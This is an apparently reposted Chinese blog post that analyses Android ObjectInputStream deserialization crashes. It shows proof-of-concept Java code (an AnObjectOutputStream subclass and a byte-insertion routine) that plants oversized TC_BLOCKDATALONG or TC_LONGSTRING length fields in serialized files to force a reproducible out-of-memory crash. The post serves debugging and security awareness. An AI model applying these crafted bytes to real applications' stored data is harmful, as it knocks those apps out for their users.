Android安全攻击——对象序列化OOM问题

来源:互联网 发布:未闻花名网络歌手歌词 编辑:程序博客网 时间:2024/06/06 04:38

前言


        最近在项目中使用ObjectInputStream/ObjectOutputStream进行对象的序列化和反序列化,出现了OOM的问题,在解决的过程中简单的研究了一下对象的序列化和反序列化(使用Serializable接口)的过程,简单做一个记录。发现了一个持久化存储序列化数据的安全风险,可能会受到恶意攻击,导致必现的OOM。

使用场景


1 数据使用方案


        持久化过程:应用在使用过程中,首先使用ObjectOutputStream的writeObject接口将对象序列化成byte数据,然后利用加密算法对序列化数据进行加密,最终将加密后的数据持久化存储到应用的数据目录下的某个文件中。



        读取解析过程:首先将数据从文件中读取出来,然后用对应的解密算法解密,最后使用对应的ObjectInputStream的readObject接口将字节流解析成对应的对象。



2 遇到的问题

        上述方案在使用的过程中,遇到以下两种OOM的崩溃

(1) OOM 1
java.lang.OutOfMemoryError: Failed to allocate a 942137073 byte allocation with 4194240 free bytes and 487MB until OOMat java.io.ObjectInputStream.readBlockDataLong(ObjectInputStream.java:569)at java.io.ObjectInputStream.readContent(ObjectInputStream.java:699)at java.io.ObjectInputStream.discardData(ObjectInputStream.java:636)at java.io.ObjectInputStream.readNewClassDesc(ObjectInputStream.java:1662)at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:657)at java.io.ObjectInputStream.readNewObject(ObjectInputStream.java:1782)at java.io.ObjectInputStream.readNonPrimitiveContent(ObjectInputStream.java:761)at java.io.ObjectInputStream.readObject(ObjectInputStream.java:1983)at java.io.ObjectInputStream.readObject(ObjectInputStream.java:1940)
(2) OOM 2
java.lang.OutOfMemoryError: Failed to allocate a 789137073 byte allocation with 2317152 free bytes and 456MB until OOM      at java.io.DataInputStream.decodeUTF      at java.io.DataInputStream.decodeUTF      at java.io.ObjectInputStream.readContent(ObjectInputStream.java:699)      at java.io.ObjectInputStream.discardData(ObjectInputStream.java:636)      at java.io.ObjectInputStream.readNewClassDesc(ObjectInputStream.java:1662)      at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:657)      at java.io.ObjectInputStream.readNewObject(ObjectInputStream.java:1782)      at java.io.ObjectInputStream.readNonPrimitiveContent(ObjectInputStream.java:761)      at java.io.ObjectInputStream.readObject(ObjectInputStream.java:1983)      at java.io.ObjectInputStream.readObject(ObjectInputStream.java:1940)  
        堆栈里面大致的意思是,在用ObjectInputStream的readObject接口进行对象的反序列化的时候,需要分配900M+/700M+的内存,导致上层出现OOM,众所周知,应用java层能够分配的最大内存由系统属性dalvik.vm.heapsize定义,这个值根据不同的厂商和机器都有可能是不一样的,我手上的测试机配如下:


        该机器的heapsize设置为256M,也就是该机器的每个应用虚拟机能够分配的最大内存即为256M,当虚拟机需要的内存超过256M时,会出现OutOfMemoryError的问题,这边顺便记录一下,很多人用Exception去捕获所有的异常,但是这样并不能捕获OutOfMemoryError,看一下继承关系:


        由继承关系可知,OutOfMemoryError是继承自Error,和Exception并不是一个继承分支,因此想要捕获包括Error在内的所有异常,必须使用Throwable去捕获。

3 分析问题


3.1 堆栈分析


        上述两个OOM实际上出现的原因是一样的,下面使用OOM1来着重分析这个问题,也就是最终调用ObjectInputStream.readBlockDataLong出现的OOM问题,先看一下这个函数:
    /**     * Reads and returns an array of raw bytes with primitive data. The array     * will have up to 255 bytes. The primitive data will be in the format     * described by {@code DataOutputStream}.     *     * @return The primitive data read, as raw bytes     *     * @throws IOException     *             If an IO exception happened when reading the primitive data.     */    private byte[] readBlockData() throws IOException {        byte[] result = new byte[input.readByte() & 0xff];        input.readFully(result);        return result;    }    /**     * Reads and returns an array of raw bytes with primitive data. The array     * will have more than 255 bytes. The primitive data will be in the format     * described by {@code DataOutputStream}.     *     * @return The primitive data read, as raw bytes     *     * @throws IOException     *             If an IO exception happened when reading the primitive data.     */    private byte[] readBlockDataLong() throws IOException {        byte[] result = new byte[input.readInt()];        input.readFully(result);        return result;    }
        上面贴出来了两个函数,readBlockData和readBlockDataLong函数,从函数名称分析,这两个函数的功能应该是类似的,readBlockDataLong函数像是用于读取较大数据量的数据,看一下注释,readBlockData函数用于读取数据量小于等于255的数据块,readBlockDataLong函数用于读取数据量大于255的数据块。
继续向上看堆栈,里面调用到了ObjectInputStream.readContent函数,看一下这个函数:
    /**     * Reads the content of the receiver based on the previously read token     * {@code tc}.     *     * @param tc     *            The token code for the next item in the stream     * @return the object read from the stream     *     * @throws IOException     *             If an IO exception happened when reading the class     *             descriptor.     * @throws ClassNotFoundException     *             If the class corresponding to the object being read could not     *             be found.     */    private Object readContent(byte tc) throws ClassNotFoundException,            IOException {        switch (tc) {            case TC_BLOCKDATA:                return readBlockData();            case TC_BLOCKDATALONG:                return readBlockDataLong();            case TC_CLASSDESC:                return readNewClassDesc(false);            case TC_OBJECT:                return readNewObject(false);            case TC_LONGSTRING:                return readNewLongString(false);            case TC_EXCEPTION:                Exception exc = readException();                throw new WriteAbortedException("Read an exception", exc);            case TC_RESET:                resetState();                return null;            default:                throw corruptStream(tc);        }    }
        这个函数是根据不同的tc(这里面认为是token),决定以不同的格式读取tc后面的数据,这个不禁让人想起利用ObjectInputStream/ObjectOutputStream进行序列化和反序列化时应该有一个特定的格式,或者说是标准,于是google了一下,找到了Serialize进行序列化的标准,见:

                                                               Grammar for the Stream Format
        
        该标准定义了Serialize序列化时每个部分写入时的顺序以及对应的tc,本文重点分析问题,不重点讲解Serialize序列化的格式标准,有兴趣的同学可以自己参照标准研究一下。上面的OOM问题也就大致能定位原因了:反序列化的数据中包含了TC_BLOCKDATALONG 的token,导致在进行反序列化的时候走到了readBlockDataLong函数中,再往上一层堆栈走,看一下ObjectInputStream.readNewClassDesc和ObjectInputStream.discardData函数:
    /**     * Reads a new class descriptor from the receiver. It is assumed the class     * descriptor has not been read yet (not a cyclic reference). Return the     * class descriptor read.     *     * @param unshared     *            read the object unshared     * @return The {@code ObjectStreamClass} read from the stream.     *     * @throws IOException     *             If an IO exception happened when reading the class     *             descriptor.     * @throws ClassNotFoundException     *             If a class for one of the objects could not be found     */    private ObjectStreamClass readNewClassDesc(boolean unshared)            throws ClassNotFoundException, IOException {        ObjectStreamClass newClassDesc = readClassDescriptor();        registerObjectRead(newClassDesc, descriptorHandle, unshared);        descriptorHandle = oldHandle;        primitiveData = emptyStream;        //load class...        // Consume unread class annotation data and TC_ENDBLOCKDATA        discardData();        checkedSetSuperClassDesc(newClassDesc, readClassDesc());        return newClassDesc;    }    /**     * Reads and discards block data and objects until TC_ENDBLOCKDATA is found.     *     * @throws IOException     *             If an IO exception happened when reading the optional class     *             annotation.     * @throws ClassNotFoundException     *             If the class corresponding to the class descriptor could not     *             be found.     */    private void discardData() throws ClassNotFoundException, IOException {        primitiveData = emptyStream;        boolean resolve = mustResolve;        mustResolve = false;        do {            byte tc = nextTC();            if (tc == TC_ENDBLOCKDATA) {                mustResolve = resolve;                return; // End of annotation            }            readContent(tc);        } while (true);    }
        看一下ObjectInputStream.readNewClassDesc函数注释,结合相关的代码,大概可以知道该函数的主要功能是读取序列化数据中class的描述,并用classloader将对应的class加载上来,然后调用discardData函数,看一下这个函数调用上面的注释,读取和消费不需要的数据,可能是一些注解annotation数据,直到读到TC_ENDBLOCKDATA为止。看一下TC_ENDBLOCKDATA的定义:
    /**     * Tag to mark a long block of data. The long following this tag     * indicates the size of the block.     */    public static final byte TC_BLOCKDATALONG = (byte) 0x7A;
这个tc代表的后面的数据块将是一个较大的数据块,tc后面的int型数据(4个字节组成)代表的是这个数据块的数据长度。
         进一步的,导致问题的原因可以总结为:利用ObjectInputStream.readObject接口进行对象的反序列化时,读取完class的相关数据,利用classloader加载完该class后,ObjectInputStream.discardData函数会尝试消耗掉反序列化时不需要的TC_ENDBLOCKDATA数据,在读取后面的4字节组成的数据长度后,调用readBlockDataLong函数创建一个int型大小的byte数组时,出现了OOM。

3.2 TC_ENDBLOCKDATA异常数据分析


        要看TC_ENDBLOCKDATA数据正常情况下什么时候会被写入,要从序列化的流程ObjectOutputStream函数中查找线索,在ObjectOutputStream.java中搜索TC_ENDBLOCKDATA,看到TC_ENDBLOCKDATA仅在函数drain中被使用到,看一下该函数:
    /**     * Writes buffered data to the target stream. This is similar to {@code     * flush} but the flush is not propagated to the target stream.     *     * @throws IOException     *             if an error occurs while writing to the target stream.     */    protected void drain() throws IOException {        if (primitiveTypes == null || primitiveTypesBuffer == null) {            return;        }        // If we got here we have a Stream previously created        int offset = 0;        byte[] written = primitiveTypesBuffer.toByteArray();        // Normalize the primitive data        while (offset < written.length) {            int toWrite = written.length - offset > 1024 ? 1024                    : written.length - offset;            if (toWrite < 256) {                output.writeByte(TC_BLOCKDATA);                output.writeByte((byte) toWrite);            } else {                output.writeByte(TC_BLOCKDATALONG);                output.writeInt(toWrite);            }            // write primitive types we had and the marker of end-of-buffer            output.write(written, offset, toWrite);            offset += toWrite;        }        // and now we're clean to a state where we can write an object        primitiveTypes = null;        primitiveTypesBuffer = null;    }
        分析一下该函数可知,TC_BLOCKDATALONG标记和后面int型的长度字段是一起被写入到output流中的,再看上面的长度最大不会超过1024,当数据量较大时,整个数据块被分成多个大小为1024字节的TC_BLOCKDATALONG数据库写入到output流中,也就是说正常情况下,系统中TC_BLOCKDATALONG后面的长度字段不可能超过1024,因此,可以得出结论,上述出现OOM的过程中应该是最终用来进行反序列化的数据本身是有问题的,进一步的,极有可能是在数据存储、数据解密的过程中出现的问题。

3.3 异常复现

       
        经过上述分析可知,最终进行反序列的数据有问题,导致OOM,顺着这个思路,直接看一下ObjectInputStream.writeClassDesc函数:
    /**     * Write a class descriptor {@code classDesc} (an     * {@code ObjectStreamClass}) to the stream.     *     * @param classDesc     *            The class descriptor (an {@code ObjectStreamClass}) to     *            be dumped     * @param unshared     *            Write the object unshared     * @return the handle assigned to the class descriptor     *     * @throws IOException     *             If an IO exception happened when writing the class     *             descriptor.     */    private int writeClassDesc(ObjectStreamClass classDesc, boolean unshared) throws IOException {        if (classDesc == null) {            writeNull();            return -1;        }        output.writeByte(TC_CLASSDESC);        writeClassDescriptor(classDesc);            annotateClass(classToWrite);            drain(); // flush primitive types in the annotation            output.writeByte(TC_ENDBLOCKDATA);            writeClassDesc(classDesc.getSuperclass(), unshared);                return handle;    }    /**     * Writes optional information for class {@code aClass} to the output     * stream. This optional data can be read when deserializing the class     * descriptor (ObjectStreamClass) for this class from an input stream. By     * default, no extra data is saved.     *     * @param aClass     *            the class to annotate.     * @throws IOException     *             if an error occurs while writing to the target stream.     * @see ObjectInputStream#resolveClass(ObjectStreamClass)     */    protected void annotateClass(Class<?> aClass) throws IOException {        // By default no extra info is saved. Subclasses can override    }
        看下这个函数,里面调用writeClassDescriptor函数将class的描述写入到output中,然后调用annotateClass函数,接着写入TC_ENDBLOCKDATA,作为class描述的结束符,上面的ObjectInputStream.readNewClassDesc函数在读出class的描述后,会调用discardData函数,这个函数会检查在class的描述后面是否存在对应的tc。
        根据这个思路可以继承ObjectInputStream函数,并在annotateClass函数中写入(TC_BLOCKDATALONG, 数据长度),当写入的数据长度较大时,会出现必现的OOM,代码如下:
import android.util.Log;import java.io.DataOutputStream;import java.io.IOException;import java.io.ObjectOutputStream;import java.io.OutputStream;import java.lang.reflect.Field;public class AnObjectOutputStream extends ObjectOutputStream {    private static final String TAG = "AnObjectOutputStream";    /**     * 复现堆栈java.io.ObjectInputStream.readBlockDataLong     * 默认复现这个堆栈     */    private static byte[] DISCARD_BYTES_LONG_DATA = new byte[] {            0x7a, 0x7a, 0x7a, 0x67, 0x67    };    /**     * 复现堆栈 java.io.DataInputStream.decodeUTF     *         java.io.DataInputStream.decodeUTF     *         java.io.ObjectInputStream.readNewLongString     */    private static byte[] DISCARD_BYTES_LONG_STRING = new byte[] {            0x7c, 0x7a, 0x7a, 0x67, 0x67    };    private DataOutputStream mInnerOutput;        private boolean mStackBlockData = true;    public AnObjectOutputStream(OutputStream input) throws IOException {        super(input);    }    /**     * 调用setStackBlockData(false),将复现下面的堆栈     * 复现堆栈 java.io.DataInputStream.decodeUTF     *         java.io.DataInputStream.decodeUTF     *         java.io.ObjectInputStream.readNewLongString     */    public void setStackBlockData(boolean blockData) {        mStackBlockData = blockData;    }    protected void annotateClass(Class<?> aClass) throws IOException {        // By default no extra info is saved. Subclasses can override        Log.i(TAG, "annotateClass aClass:" + aClass);        installOutputStream();        if (mInnerOutput == null) {            return;        }        if (mStackBlockData) {            mInnerOutput.write(DISCARD_BYTES_LONG_DATA);        } else {            mInnerOutput.write(DISCARD_BYTES_LONG_STRING);        }        Log.i(TAG, "annotateClass write success");    }    private void installOutputStream() {        Object obj = null;        try {            Field field = getClass().getSuperclass().getDeclaredField("output");            field.setAccessible(true);            obj = field.get(this);        } catch (Exception e) {            e.printStackTrace();        }        if (obj == null) {            Log.i(TAG, "installOutputStream failed");            return;        }        mInnerOutput = (DataOutputStream)obj;    }}
        由于ObjectOutputStream中的output成员属性为private,因此需要借助反射。果然,使用AnObjectOutputStream替代常规的ObjectOutputStream,运行一下必现的OOM,完整的调用如下:
import com.example.testpopupwindow.stream.AnObjectOutputStream;import java.io.ByteArrayInputStream;import java.io.ByteArrayOutputStream;import java.io.IOException;import java.io.ObjectInputStream;import java.io.ObjectOutputStream;import java.io.Serializable;public class SerializeThread extends Thread {    private static final String TAG = "SerializeThread";    private Employee mEmployee;    public void run() {        mEmployee = Employee.create("test");        Object obj = null;        try {            byte[] serializeRes =  serialize();            obj = unserialize(serializeRes);        } catch (IOException e) {            e.printStackTrace();        }    }    private byte[] serialize() throws IOException {        ByteArrayOutputStream arrOs = new ByteArrayOutputStream();        ObjectOutputStream oos = new AnObjectOutputStream(arrOs);        oos.writeObject(mEmployee);        oos.flush();        byte[] outArr = arrOs.toByteArray();        oos.close();        return outArr;    }    private Object unserialize(byte[] serializedata) throws IOException {        ByteArrayInputStream byteArrayInputStream = null;        ObjectInputStream objectInputStream = null;        try {            byteArrayInputStream = new ByteArrayInputStream(serializedata);            objectInputStream = new ObjectInputStream(byteArrayInputStream);            return objectInputStream.readObject();        } catch (Exception e) {        }        return null;    }    /**     * test error....     */    public static class Employee implements Serializable {        String mName;        /**         * test error....         */        private Employee(String name) {            mName = name;        }        public String toString() {            return "Employee mName:" + mName;        }        public static Employee create(String name) {            return  new  Employee(name);        }    }}
         只要调用new SerializeThread().start(),即会出现下面的OOM堆栈:



3.4 安全问题

        
        由上面的OOM问题,引出来一个ObjectInputStream/ObjectOutputStream实现Serialize序列化的安全问题,使用默认的ObjectOutputStream方式生成序列化数据,保存在本地后,如果被恶意在指定位置写入类似上述的字段,会导致应用在利用被修改后的序列化数据进行反序列化时,出现必现的崩溃。假设上述Employee在被序列化后生成的文件16进制数据如下:



插入的代码如下:
    private byte[] mDiscardBytes = new byte[] {            0x7a, 0x7a, 0x7a, 0x67, 0x67    };    private byte[] modifyBlockDataSize(byte[] content) {        for (int i=0; i<content.length; i++) {            if (content[i] == (byte)0x78) {                return insertLongBlockData(content, i);            }        }        return null;    }    private byte[] insertLongBlockData(byte[] data, int insertPos) {        byte[] newArray = new byte[data.length + mDiscardBytes.length];        System.arraycopy(data, 0, newArray, 0, insertPos);        System.arraycopy(mDiscardBytes, 0, newArray, insertPos, mDiscardBytes.length);        System.arraycopy(data, insertPos, newArray, insertPos + mDiscardBytes.length, data.length - insertPos);        return newArray;    }
经过这个处理以后,得出的序列化数据如下:



        被圈出来的部分为插入的数据,经过上述插入后,反序列化以后会造成应用必现的OOM崩溃。
        至于上面为什么要判断0x78,这个要参考一下ObjectInputStream.writeClassDesc和ObjectInputStream.readNewClassDesc函数,readNewClassDesc在读取完class的描述信息后,会尝试调用discardData方法读以TC_ENDBLOCKDATA(0x78)结尾之类的annoation之类的信息,而在discardData方法中会触发检查和读取TC_BLOCKDATALONG或者TC_LONGSTRING,因此只要在0x78前面插入一段TC_BLOCKDATALONG或者TC_LONGSTRING的tc和长度数据即可。

3.5 总结


(1)使用ObjectInputStream/ObjectOutputStream进行对象的序列化和反序列化出现的OOM问题,一般都是因为反序列化时的数据有问题;
(2)使用ObjectInputStream/ObjectOutputStream存在一定的安全风险,注意最起码要对序列化以后的数据进行加密
(3)在ObjectInputStream进行反序列化的时候,要用Throwable捕获包括error在内的所有异常,以便捕获OOM后继续运行


0 0
原创粉丝点击